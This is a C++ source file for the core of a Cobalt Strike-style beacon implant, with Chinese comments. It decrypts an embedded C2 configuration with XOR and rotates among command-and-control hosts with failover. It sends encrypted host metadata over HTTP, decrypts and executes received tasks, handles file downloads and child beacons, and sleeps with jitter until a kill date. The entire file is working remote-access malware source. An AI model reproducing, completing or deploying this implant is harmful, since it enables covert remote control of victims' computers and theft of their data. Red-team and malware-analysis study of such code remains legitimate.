244 lines
5.9 KiB
C++
244 lines
5.9 KiB
C++
|
|
|||
|
#include <iostream>
|
|||
|
|
|||
|
#include "Utils.h"
|
|||
|
#include "Global.h"
|
|||
|
#include "rotation.h"
|
|||
|
#include "encrypt_decrypt.h"
|
|||
|
#include "common.h"
|
|||
|
#include "comm.h"
|
|||
|
#include "BeaconTask.h"
|
|||
|
#include "BeaconLateralMovement.h"
|
|||
|
#include "ChildBeacon.h"
|
|||
|
#include "BeaconSleep.h"
|
|||
|
#pragma comment(lib,"ws2_32.lib")
|
|||
|
#pragma comment(lib,"Wininet.lib")
|
|||
|
#ifdef _WIN64
|
|||
|
|
|||
|
#pragma comment(lib,"tomcryptx64.lib")
|
|||
|
#pragma comment(lib,"tommathx64.lib")
|
|||
|
#else
|
|||
|
|
|||
|
#pragma comment(lib,"tomcrypt.lib")
|
|||
|
#pragma comment(lib,"tommath.lib")
|
|||
|
#endif // _WIN64
|
|||
|
|
|||
|
|
|||
|
|
|||
|
void Beacon_init(HINSTANCE dllbase)
|
|||
|
{
|
|||
|
Beacon_Dllbase = dllbase;
|
|||
|
//分配c2配置信息内存块
|
|||
|
CsC2Config = (char*)malloc(CsC2Config_size);
|
|||
|
memset(CsC2Config, 0, CsC2Config_size);
|
|||
|
|
|||
|
//解密内嵌的配置信息
|
|||
|
for (int i = 0; i < 0x1000; ++i)
|
|||
|
{
|
|||
|
rawData[i] ^= 0x2Eu;
|
|||
|
}
|
|||
|
|
|||
|
datap c2profile;
|
|||
|
BeaconDataParse(&c2profile, (char*)rawData, 4096);
|
|||
|
for (int index = BeaconDataShort(&c2profile); ; index = BeaconDataShort(&c2profile))
|
|||
|
{
|
|||
|
if (index <= 0)
|
|||
|
{
|
|||
|
break;
|
|||
|
}
|
|||
|
WORD data_type = BeaconDataShort(&c2profile);
|
|||
|
WORD data_size = BeaconDataShort(&c2profile);
|
|||
|
int size = index_size * index;
|
|||
|
|
|||
|
*(WORD*)(CsC2Config + size) = data_type;
|
|||
|
switch (data_type)
|
|||
|
{
|
|||
|
case 1:
|
|||
|
*(WORD*)(CsC2Config + size + sizeof(size_t)) = BeaconDataShort(&c2profile);
|
|||
|
break;
|
|||
|
case 2:
|
|||
|
*(DWORD*)(CsC2Config + size + sizeof(size_t)) = BeaconDataInt(&c2profile);
|
|||
|
break;
|
|||
|
case 3:
|
|||
|
//分配一块内存存放str
|
|||
|
*(ULONG_PTR*)(CsC2Config + size + sizeof(size_t)) = (ULONG_PTR)malloc(data_size);
|
|||
|
void* data = BeaconDataPtr(&c2profile, data_size);
|
|||
|
//取出刚才分配的内存地址开始复制数据
|
|||
|
memcpy(*(ULONG_PTR**)(CsC2Config + size + sizeof(size_t)), data, data_size);
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
memset(rawData, 0, sizeof(rawData));
|
|||
|
return;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
int beacon_stop_date()
|
|||
|
{
|
|||
|
struct _SYSTEMTIME SystemTime;
|
|||
|
|
|||
|
// killdate
|
|||
|
if (!get_dword(40))
|
|||
|
{
|
|||
|
return get_dword(40);
|
|||
|
}
|
|||
|
GetLocalTime(&SystemTime);
|
|||
|
return SystemTime.wDay + 100 * (SystemTime.wMonth + 100 * (unsigned int)SystemTime.wYear) >= get_dword(40);
|
|||
|
}
|
|||
|
|
|||
|
int Beacon_exit()
|
|||
|
{
|
|||
|
|
|||
|
if (get_short(55) == 1)
|
|||
|
{
|
|||
|
if (get_short(39) == 1)
|
|||
|
{
|
|||
|
while (1)
|
|||
|
{
|
|||
|
Sleep(0x3E8);
|
|||
|
}
|
|||
|
}
|
|||
|
ExitThread(0);
|
|||
|
}
|
|||
|
if (get_short(39) != 1)
|
|||
|
{
|
|||
|
ExitProcess(0);
|
|||
|
}
|
|||
|
HANDLE threadhandle = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ExitProcess, 0, 0, 0);
|
|||
|
return WaitForSingleObject(threadhandle, 0xFFFFFFFF);
|
|||
|
}
|
|||
|
|
|||
|
int main()
|
|||
|
{
|
|||
|
Beacon_init(NULL);
|
|||
|
datap* parser = BeaconDataInit(0x280);
|
|||
|
char* http_get_url = BeaconDataPtr(parser, 256);
|
|||
|
BeaconDataPtr(parser, 256);
|
|||
|
|
|||
|
char* ServerHost_buffer = (char*)BeaconDataPtr(parser, 128);
|
|||
|
|
|||
|
char* ServerIP = get_str(8);
|
|||
|
int ServerPort = get_short(2);
|
|||
|
|
|||
|
char* lpszAgent = get_str(9);
|
|||
|
char* ServerPostUrl = get_str(10);
|
|||
|
|
|||
|
g_dwMilliseconds = get_dword(3);
|
|||
|
g_jitter = get_short(5);
|
|||
|
|
|||
|
int conne_error = 0;
|
|||
|
|
|||
|
|
|||
|
//初始化轮询相关
|
|||
|
rotationstruc* rotation_opt = (rotationstruc*)malloc(sizeof(rotationstruc));
|
|||
|
|
|||
|
//69 和failover(错误切换)有关 纯failover模式 69等于0
|
|||
|
//当是按照错误次数切换的时候69等于指定次数
|
|||
|
int failover_Strategy_number = get_dword(69);
|
|||
|
|
|||
|
//70也与failover有关当是按照时间切换的时候70等于指定的时间
|
|||
|
int failover_Strategy_time = get_dword(70);
|
|||
|
|
|||
|
//68 如果是rotate模式 跟切换时间有关
|
|||
|
int rotate_Strategy_time = get_dword(68);
|
|||
|
|
|||
|
//67 是模式id
|
|||
|
//2表示rotate或failover
|
|||
|
//如果是random则是1 随机模式
|
|||
|
//如果是round-robin则是0 默认模式
|
|||
|
int strategyID = get_short(67); // 67 68 69 70和轮询模式相关
|
|||
|
|
|||
|
|
|||
|
//
|
|||
|
//69 与错误切换有关默认-1非错误切换 单错误切换等于0
|
|||
|
//如果是-x表示根据次数切换 69等于相应的次数
|
|||
|
init_rotation(rotation_opt, strategyID, rotate_Strategy_time, failover_Strategy_time, failover_Strategy_number);
|
|||
|
|
|||
|
|
|||
|
if (beacon_stop_date())
|
|||
|
{
|
|||
|
Beacon_exit();
|
|||
|
}
|
|||
|
int server_output_size = get_dword(4); //.http-get.server.output
|
|||
|
char* server_output_buffer = (char*)malloc(server_output_size);
|
|||
|
Generate_encryption_metadata(server_output_buffer, server_output_size);// 构造元数据并加密
|
|||
|
while (g_dwMilliseconds)
|
|||
|
{
|
|||
|
char* p_ServerHost = beacon_Rotation_Strategy(rotation_opt, ServerIP, conne_error);// 轮询取出host
|
|||
|
_snprintf(ServerHost_buffer, 0x80, "%s", p_ServerHost);
|
|||
|
conne_error = 0;
|
|||
|
char* p_ServerUrl = beacon_Rotation_Strategy(rotation_opt, ServerIP, 0);
|
|||
|
_snprintf(http_get_url, 0x80, "%s", p_ServerUrl);
|
|||
|
g_BeaconStart = 1;
|
|||
|
_snprintf(g_post_url, 0x100u, "%s", ServerPostUrl);
|
|||
|
set_winit_http(ServerHost_buffer, ServerPort, lpszAgent);// 设置一些http选项
|
|||
|
|
|||
|
int server_out_size = call_send_Metadata(http_get_url, server_output_buffer, server_output_size);
|
|||
|
if (server_out_size > 0)
|
|||
|
{
|
|||
|
int taskdata_size = decrypt_output_data(server_output_buffer, server_out_size);// 解密
|
|||
|
server_out_size = taskdata_size;
|
|||
|
if (taskdata_size > 0)//有任务
|
|||
|
{
|
|||
|
Parse_Task((BeaconTask*)server_output_buffer, taskdata_size);// 对解密后的任务进行执行
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
if (server_out_size == -1)
|
|||
|
{
|
|||
|
//连接失败
|
|||
|
conne_error = 1;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
sub_1000715A();
|
|||
|
|
|||
|
if (get_dword(28))
|
|||
|
{
|
|||
|
CheckDownload(4096); // 文件下载相关
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
CheckDownload(0x80000);
|
|||
|
}
|
|||
|
CheckChildBeacon();
|
|||
|
CheckJobOutput();
|
|||
|
if (beacon_stop_date()) // 判断是否有结束运行日期
|
|||
|
{
|
|||
|
Beacon_end();//结束
|
|||
|
}
|
|||
|
if (g_withdatasize > 0)
|
|||
|
{
|
|||
|
close_http_Handle();
|
|||
|
set_winit_http(ServerHost_buffer, ServerPort, lpszAgent);
|
|||
|
sned_beacon_data(gBeaconOutputData);
|
|||
|
}
|
|||
|
}
|
|||
|
close_http_Handle();
|
|||
|
if (beacon_stop_date())
|
|||
|
{
|
|||
|
Beacon_exit();
|
|||
|
}
|
|||
|
if (!g_dwMilliseconds)
|
|||
|
{
|
|||
|
break;
|
|||
|
}
|
|||
|
if (g_jitter)
|
|||
|
{
|
|||
|
int temp = g_dwMilliseconds * g_jitter / 0x64;
|
|||
|
temp = temp ? random_int() % temp : 0;
|
|||
|
int dwMilliseconds = g_dwMilliseconds;
|
|||
|
if (temp < g_dwMilliseconds)
|
|||
|
{
|
|||
|
dwMilliseconds = g_dwMilliseconds - temp;
|
|||
|
}
|
|||
|
BeaconSleep(dwMilliseconds);
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
BeaconSleep(g_dwMilliseconds);
|
|||
|
}
|
|||
|
}
|
|||
|
free(rotation_opt);
|
|||
|
return Beacon_exit();
|
|||
|
}
|